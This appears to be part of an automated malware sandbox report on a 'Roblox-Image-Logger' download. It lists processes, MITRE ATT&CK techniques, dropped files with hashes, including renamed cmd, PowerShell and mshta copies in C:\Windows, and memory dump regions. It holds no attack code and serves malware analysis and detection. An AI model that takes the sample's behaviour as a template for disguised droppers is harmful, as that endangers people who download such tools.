PID:748

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2480

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2812

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1372

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3432

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1684

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3688

C:\Program Files\Microsoft Office\root\Office16\Winword.exe
"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger-Roblox-Image-Logger\README.md"
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3840

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
3⤵
PID:5184

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:5668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
330B

MD5
460599476b54808e358ff1c417c234f8

SHA1
077e7d9b1896720f5a577cf439d61acdfaed24bd

SHA256
7abbc64148ba2cbbb0492b1b0303b50bf4be7da171de25d1c444c01e9d071cbf

SHA512
192748f7e10ba9665497ca4512a9c0eeea374c68c1a48d94452e9cac9eeaf39bb3eb26fc7c9545fb0c89a646db0451477d153bc1c9bec74ba957e51bec9f124a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
86b9d1160acf98ba8fd8373ea51cffc1

SHA1
3cf9c63556f724ed2f47c11fda2f209731059f3e

SHA256
54789ec86ee0a94cda291725bdb283e7a12ec94ad40dfde70f584272eb5fef12

SHA512
6125cd297080db1823cd9628929b510f9a5dea83132973a6980accfe7979554db1314262e0d34c6dd764edcb6aff45613a1775ec7f1e1085e1ab5e1693d23a42

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
b1ef34dcc3a20f69194012505f88752a

SHA1
647ab5a50b74a3644419ffef88ca5c8c36f40431

SHA256
88e8678bf493100c34ce52b81b613ae71e8a4206691909b88b8d10e1a87092b8

SHA512
d6830e076a8785b60c0a88e874a8309d629a160e41e2d8ffd41b67aaf89126d116f0ee1fe44ef2a2f18a084a5878f0ca0993363a3cfbdfe7deaeb15d9d5f3c10

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\541a6ff0-e5c9-4d4d-9842-8302436d2e0a.tmp

Filesize
259KB

MD5
a390851853a3e5ea63f1fd117bf71efe

SHA1
614532579373acdc41535b925c6980c0cd1225b0

SHA256
1a96dea832fe78a5dd544eae37549f9a439bd65d33ab087238c632d07f531e7f

SHA512
500133bc91c004bebc186cbbb4a1aab59bc12efdf52677285eb89cd69f72900c68d425a6b2e124260b9274476b3fdfb390b5e07385acb8103bceeff7f2f2c7d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
8d69ddf196f1f492d6b2725685467308

SHA1
08460292923eeb8e46811ca1a6f94508094b379e

SHA256
b01fbe35c066f656564093abc16134b23cb43fe05bcd6158acc8ad50bda3c2e7

SHA512
f6e6b9fac450eda537b43e94546e82ea7478011ab4c52cf097e4dc9087a7b69c8662292971ebbfc3b078e964e2ece5d0d1fb381813fbe8e221edda930bfdfb79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
e9151825d4ce1d603ad6621eba28f25a

SHA1
93bc2335286b24053e663dd5deb5acb6492fef49

SHA256
b4ac19c51b79d13dd8d16eeff0585aa1d40bc20800bb1b266e46a4e757ed459b

SHA512
56c1ec2c6da6f5ea66f1631fd567593bce2a47c009dbe86df34ebf3310efb32a145fb0474e520bce477dfe586ed7acdc4a979c41fc8cc6ed7a4e56e5f4f3ad3f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
5c8f38b24064f92bb2e93e16267c2042

SHA1
e8052ac20c811714274cfb031fc2699fee32a7ce

SHA256
878e81060697f7a5ecbb6c5453b465141749fb99fe7709efd74fd256febbeb62

SHA512
f924cbdab52c3e9bcddf3d5d34582602fce1a2cc845d54e5c07bbd9184e8b1f489da6e0673691fb45f1f0cb847ed750e169cc8d95b9f2e3b6ed81b2507d9c7b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
ad58f4f90a2eda55d993816cab1bf6a2

SHA1
d7e6e5495efd9e7a742a5729b6e8e64876104273

SHA256
46993dbdeaa22d54cc708b4cead249b6a296b065257c2fcdd72afdba9338a489

SHA512
bd038822f15936f356203fafae7c0e8ae02a05b302cf77fa2da83c49d9d532ff9caf01dfa7fb9b4fa1ef8494b2c860250c2a89d5182be4e7247b88890c43f44c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
3b0183c53708e250fda8647e9c428d63

SHA1
9e153382306449f5addd22641960bf7629749225

SHA256
dfeb8e2c8856c7428db340d01dc45f53ff86dfae524628de640de85a8cc8279b

SHA512
bfe530fdd8fa975b032b64052208ff097fb73701174fdf4c90f9f94675939906d780522acc9488bb66221ce4168505f2b0a45ed907f036bd9162ce9b594fef7d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
41ab54013b89baba8c28087207839feb

SHA1
16489a3b7fb5491f31f6c264c6698bf33ed2e7e8

SHA256
cf478a6ccabb75066271cf375f63e530db474c4028a35ba91755f47c695f50e2

SHA512
1caef05dfd747c6dc2a08e6eb110a34653ba11989c61ddc396afce80c59db4d9c5aade583c293d05b9d885b14d751cab9309b6606969d9a80b552afb802e78a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
32fba8b26a221ea21c3339dc550a5769

SHA1
f5b1e1924c14a8449d3a6740ed47ddbf145f1f6d

SHA256
a91304c158db20da40810e289daf3b2b7425e779827faa32becd2cbb97f9e36f

SHA512
d260a0e15b350eafb67fdc0d2cbb16d5796facf738c66392415aaa3730821bb00e24cdf1d82179606f0007d73d4a892656d926b0735820ee17b2b3cb2aa9a8d2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
259KB

MD5
bd749ebd85af7e083f71902c84209bcd

SHA1
615cb60d03edda6e9a470f2fd043553d49cadced

SHA256
19e02b8449cd0ec0218d811d18229a75da460f5934fdc7d1a2b31c415e5166ce

SHA512
5711048bf9fecb55e8a6ca476add56e0dd1beb9718ead6319d2eb0ddf166f7f8aa7b2a224577a1520bbf6b22526b3d317c149b5f539a05d2ebd241619347aad2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
de47c3995ae35661b0c60c1f1d30f0ab

SHA1
6634569b803dc681dc068de3a3794053fa68c0ca

SHA256
4d063bb78bd4fa86cee3d393dd31a08cab05e3539d31ca9f0a294df754cd00c7

SHA512
852a9580564fd4c53a9982ddf36a5679dbdce55d445b979001b4d97d60a9a688e532821403322c88acc42f6b7fa9cc5e964a79cbe142a96cbe0f5612fe1d61cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
704d4cabea796e63d81497ab24b05379

SHA1
b4d01216a6985559bd4b6d193ed1ec0f93b15ff8

SHA256
3db2f8ac0fb3889fcf383209199e35ac8380cf1b78714fc5900df247ba324d26

SHA512
0f4803b7b7396a29d43d40f971701fd1af12d82f559dcfd25e0ca9cc8868a182acba7b28987142c1f003efd7dd22e474ac4c8f01fe73725b3618a7bf3e77801d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
e6f697a675be61b3b5d38084f9702d05

SHA1
d699b08856463af482807c06c526b1d3aad3d913

SHA256
be9b327ce4235a28c7f7b8a957831ee3484ed313dbc1ad8e39197e86a21bffc1

SHA512
07a2190b631514cda113e33b466511713bf40b2f3c5eac238cdfd99990b504461284f0935079c4260f1803072d290820fa9c06942a4c75261cf16f3c06d62fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
94716db8a4f3d9b64b6c3234c31ab99e

SHA1
212ef4fb095c5d4f3f7cf7ffb3d4bdbd175b270f

SHA256
31b69e06e12f39d0cf66a18d7ae456a451f7a085d6adc5891f4268771dc2398e

SHA512
1f6cacaa86694623245f1e1b70252b319c7ffac2fb554a038f780242216ff197e0ec38a6f28aad8bf142c25ed9cd05f23516dd9b5b03a811ed6eb40daf4c2d0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
902ac7b46146fc53e1a8c75705e1fba0

SHA1
91cbb3076f4528a6a62ede2acf96bb96c35101f7

SHA256
685a3c6805996843eabee6c1d7114e69670c0eb2fd014d4375e96a3944afde20

SHA512
8ea431aef21a0de1aad7dacc205937e25e52164b5e91eb1ca9ac25b0a081876a5e65cc9ab5664dd03090bd4046d87f1481ac73dd4f42bd628233151535dddf6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
964fea97c56237794a5c83201f1ea3f4

SHA1
d108c3f860368ea9695aeeb063354297709dc05d

SHA256
99c4371d9b14c0740be96807fc1ff9b1c7d8a7e673fcbe6266f4c33a9cdcc3f1

SHA512
575b84bb0e5f221a2fd5c12baa2433f68e845122a3447f999eec8cb0d3469103a7d214109c017661598c15ff18e66a2fef69f689e5769ec117c101f9f6eb514b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b4186989-b32d-484b-99e3-386aea9fa576.tmp

Filesize
6KB

MD5
66bb6183ecdbe2fe943742b12d973f5f

SHA1
ac60404fba523dbbe5ed6b5421c177fdfb49a901

SHA256
180b390830115783978e7a2bfe95626805875481cb291b9bb86c90baf07a8fd2

SHA512
d3b4bc299c0efc109333b90b8ae527b76b617fb494d80c21e72cf505875c8fd2ed045ce9a5f923b86ce451845e3c5acd1e986b727e36b3529f883d7bcae4b4b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2ddfc7ed771f5af14dfa9ec73a827d9e

SHA1
cddfd217c9aff8a327f3dcf224c3d3406a06cdc5

SHA256
3e918b01fb5ee4999e97fadfbb6905f0f3fb51349598421a277ee88dec1817d5

SHA512
999f571b395b8e2f02d6d3f09478febec200b492a0309414de584e61cc7dfef03e0df272722c847f2368c86042b7a04886e27f23312bfedc7669059d40ebd2af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3c686e4a5090db167050059b4af41caa

SHA1
931fbfd957696e278d045b012695f6c49070447e

SHA256
f4c10789cbbedfd3383aa4252e72220cc315ed29e6db31da1776abb1dc28a4f9

SHA512
90c843b6f068fa94f7e812e5712b926ec3a5cf59c364f77f868a797a7d7a10b0d2fa3ea0a5663f829464b786479c7f7170da7b78bc2dd85780d7e7c17dd6a2c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRD0003.docx

Filesize
11KB

MD5
6d6bcf71cb3e0bb08f9c6375f4604701

SHA1
2d20bd44b6dea072b6807126f3e36f7e9c1fe0a3

SHA256
79ed8491010e9cda1915fc3b09d003a027b4fa1dbcceea7688068fe92f147be7

SHA512
56750194c9842174b61729c577e5e0eb40985c3bacb9c0b09483d0c6d56cee77d8ce91ab2a995f4451c345db415b147f7bcb499221f8c044ad5d019e0d083cdc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRD0005.docx

Filesize
11KB

MD5
86bcb6f93b65e6fed96c97b8ffa2ef62

SHA1
e570fc55d8e6b46e69998ff28a02c94f0b65ac39

SHA256
7aabb53785d41e05a8226d9945602b9ab3bc8ab2ca50aeb6c4dd8c0d4cdd8731

SHA512
102cd8134dc718a628c9256770c52259f650a68c7edf668ad98ce13010af2d9e449f57256167a1315d4d32cd34a888a49164bc1d9182cefed759a457e1f29bc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD9844.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ucxmq5oa.5y5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
243B

MD5
0b13b335adfd3c2e8bc18b5492d0d229

SHA1
92e785434cceb51e231e463ff174760f0e819fdd

SHA256
2e5d271546d0d7a41d7450d900f299bba642f75233347f654164af150a25735e

SHA512
7b2242fec4f67d581fefd7f2f35d5ea4177554d8a366d73e7bfdec148a3bf5b580e4add2b7da392e154317922b085a7ddc2ac2b7dcf8a7f20c07896621a98dc1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
10KB

MD5
9261d0479d3ee1b3f8b1cdcfa2c375e1

SHA1
faf05342570aa6c7038dbb2961783bc13fd3b01c

SHA256
e8d0287b3b66c61e094589cdaa5a5bc7393c3a6dedbe724eed50d2a27d684216

SHA512
ff1e6613b5e9c30d7039c2f6beb9013c25b8033042e3bbba5e2c8098df2fe98d46e29aac8b5277e35513e8d5a4cc456d6f3122f4f6d087ca6b071d1039ba9745

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
10KB

MD5
3294c087fbc4a62f06b4c65d71d0a838

SHA1
d09f151f169da26fcee06eea979ad82bd034a7db

SHA256
c61001de815cb01f74baae625faea727a9dfa8efe1851e28aa47aa4ab554bef0

SHA512
130797261b20fafec1d9c593576da69755b4fef9d2537a769d756baada7882a851b9e751152b897ca3058a22d52a93b5b737d7584dd3ed29312c6ab6bc268f22

Download Submit
C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger.bat

Filesize
14.9MB

MD5
922173bce190a729a7541904e53ffba5

SHA1
d98240a8deb45581eb15e1ec4d5238f914bee80d

SHA256
bce1a795abd87b0db2ea2577de28ade5f46d275e47f0424fbcd728684f939c0b

SHA512
1b4cad22fe047018dc95825b7faaa21b0b0936f1de85886abbf5ca85b59d5fab8da35921758df62fe614e5473b664e6000a95218615bfbd41938149a07e81f5f

Download Submit
C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger-Roblox-Image-Logger\Roblox-Image-Logger.bat:Zone.Identifier

Filesize
108B

MD5
673d923d7c9b23a0b4f9152745af82b7

SHA1
35368bbfbf0ba6078036fb37e8cde31111e455d8

SHA256
4c3fff3344c2a3268f6598d53e6122ee1333bd2feb95f7b2a9d65db1c18bd093

SHA512
77de1f68b940a5b8bb95492e791504127a631fe3c6cddd4822ed7232b5000c22625271b47ccf5b07e481796c626b8ef5e10fbed2e14930072f1d5c7398b161f0

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 311777.crdownload

Filesize
10.7MB

MD5
9611b1ea6840a94534585c5bc9d9ae68

SHA1
73ac8446403319393fa7c4e2c8f89a8be64a1390

SHA256
60d10944b0df9af680799a78228393c939a7faf174306c810ce311ef6051fa12

SHA512
c0b8e8fc2061e6f106ab5c96843cfad9c2943ad675443afd4a6bb7740025ba3b7c087c94e8abcc68b758fbff0fe7162bcea8d19c0319fdbe0592fa0c2e5f0ee7

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
\??\pipe\LOCAL\crashpad_1968_UCJXDKQBVXHGQIPN

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/692-391-0x00000231A7720000-0x00000231A7749000-memory.dmp

Filesize
164KB

Download
memory/692-388-0x00007FF882390000-0x00007FF8823A0000-memory.dmp

Filesize
64KB

Download
memory/692-386-0x00000231A76F0000-0x00000231A7713000-memory.dmp

Filesize
140KB

Download
memory/692-387-0x00000231A7720000-0x00000231A7749000-memory.dmp

Filesize
164KB

Download
memory/692-390-0x00000231A7720000-0x00000231A7749000-memory.dmp

Filesize
164KB

Download
memory/692-389-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/992-404-0x000001D0989D0000-0x000001D0989F9000-memory.dmp

Filesize
164KB

Download
memory/992-402-0x00007FF882390000-0x00007FF8823A0000-memory.dmp

Filesize
64KB

Download
memory/992-403-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/992-405-0x000001D0989D0000-0x000001D0989F9000-memory.dmp

Filesize
164KB

Download
memory/996-395-0x00007FF882390000-0x00007FF8823A0000-memory.dmp

Filesize
64KB

Download
memory/996-397-0x0000026B80130000-0x0000026B80159000-memory.dmp

Filesize
164KB

Download
memory/996-396-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/996-398-0x0000026B80130000-0x0000026B80159000-memory.dmp

Filesize
164KB

Download
memory/1048-411-0x00000291B8260000-0x00000291B8289000-memory.dmp

Filesize
164KB

Download
memory/1048-410-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/1048-412-0x00000291B8260000-0x00000291B8289000-memory.dmp

Filesize
164KB

Download
memory/1048-409-0x00007FF882390000-0x00007FF8823A0000-memory.dmp

Filesize
64KB

Download
memory/1060-416-0x00007FF882390000-0x00007FF8823A0000-memory.dmp

Filesize
64KB

Download
memory/1060-417-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/1060-418-0x000001674D3C0000-0x000001674D3E9000-memory.dmp

Filesize
164KB

Download
memory/1060-419-0x000001674D3C0000-0x000001674D3E9000-memory.dmp

Filesize
164KB

Download
memory/1072-425-0x0000023F92E60000-0x0000023F92E89000-memory.dmp

Filesize
164KB

Download
memory/1072-424-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/1072-423-0x00007FF882390000-0x00007FF8823A0000-memory.dmp

Filesize
64KB

Download
memory/1168-308-0x000001C6FA8B0000-0x000001C6FA9AC000-memory.dmp

Filesize
1008KB

Download
memory/1168-316-0x000001C6FAA10000-0x000001C6FAA4E000-memory.dmp

Filesize
248KB

Download
memory/1168-280-0x000001C6C0550000-0x000001C6C0572000-memory.dmp

Filesize
136KB

Download
memory/1168-289-0x000001C6C09C0000-0x000001C6C0A06000-memory.dmp

Filesize
280KB

Download
memory/1168-314-0x000001C6C0630000-0x000001C6C0638000-memory.dmp

Filesize
32KB

Download
memory/1168-315-0x000001C6C05C0000-0x000001C6C05C6000-memory.dmp

Filesize
24KB

Download
memory/1168-312-0x000001C6FA9B0000-0x000001C6FAA08000-memory.dmp

Filesize
352KB

Download
memory/1168-311-0x000001C6D8BE0000-0x000001C6D8C3E000-memory.dmp

Filesize
376KB

Download
memory/1168-310-0x000001C6C0620000-0x000001C6C0626000-memory.dmp

Filesize
24KB

Download
memory/1168-309-0x000001C6C0600000-0x000001C6C0622000-memory.dmp

Filesize
136KB

Download
memory/1168-307-0x00007FF6FF4A0000-0x00007FF6FF50E000-memory.dmp

Filesize
440KB

Download
memory/1168-303-0x000001C6F9100000-0x000001C6F9BA8000-memory.dmp

Filesize
10.7MB

Download
memory/1168-304-0x000001C6F9BB0000-0x000001C6FA698000-memory.dmp

Filesize
10.9MB

Download
memory/1168-305-0x00007FF8C30A0000-0x00007FF8C315D000-memory.dmp

Filesize
756KB

Download
memory/1168-306-0x00007FF8C3C20000-0x00007FF8C3E29000-memory.dmp

Filesize
2.0MB

Download
memory/1168-324-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/1168-323-0x000001C6C0640000-0x000001C6C0648000-memory.dmp

Filesize
32KB

Download
memory/1168-321-0x000001C6D8C40000-0x000001C6D8C6E000-memory.dmp

Filesize
184KB

Download
memory/1168-319-0x000001C6FB730000-0x000001C6FB766000-memory.dmp

Filesize
216KB

Download
memory/1168-320-0x000001C6FB770000-0x000001C6FB7C8000-memory.dmp

Filesize
352KB

Download
memory/1168-318-0x000001C6FB680000-0x000001C6FB732000-memory.dmp

Filesize
712KB

Download
memory/1168-317-0x000001C6FAA50000-0x000001C6FB676000-memory.dmp

Filesize
12.1MB

Download
memory/1168-313-0x000001C6A81E0000-0x000001C6A81E6000-memory.dmp

Filesize
24KB

Download
memory/3840-296-0x00007FF881110000-0x00007FF881120000-memory.dmp

Filesize
64KB

Download
memory/3840-295-0x00007FF881110000-0x00007FF881120000-memory.dmp

Filesize
64KB

Download
memory/3840-294-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/3840-290-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/3840-292-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/3840-293-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/3840-291-0x00007FF883CB0000-0x00007FF883CC0000-memory.dmp

Filesize
64KB

Download
memory/4852-363-0x000001CED49D0000-0x000001CED50B4000-memory.dmp

Filesize
6.9MB

Download
memory/4852-1103-0x000001CED7BC0000-0x000001CED80E8000-memory.dmp

Filesize
5.2MB

Download
memory/4852-804-0x000001CED70A0000-0x000001CED70DC000-memory.dmp

Filesize
240KB

Download
memory/4852-790-0x000001CED6F20000-0x000001CED6FC2000-memory.dmp

Filesize
648KB

Download
memory/4852-788-0x000001CED7360000-0x000001CED7522000-memory.dmp

Filesize
1.8MB

Download
